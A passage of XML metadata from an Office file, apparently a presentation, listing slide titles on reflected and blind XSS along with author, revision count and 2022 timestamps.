      <vt:lpstr>Reflected XSS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Blind XSS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ROCKTIM</dc:creator>
  <cp:lastModifiedBy>ROCKTIM</cp:lastModifiedBy>
  <cp:revision>20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-10-19T19:32:42Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-10-27T08:40:58Z</dcterms:modified>
</cp:coreProperties>
</file>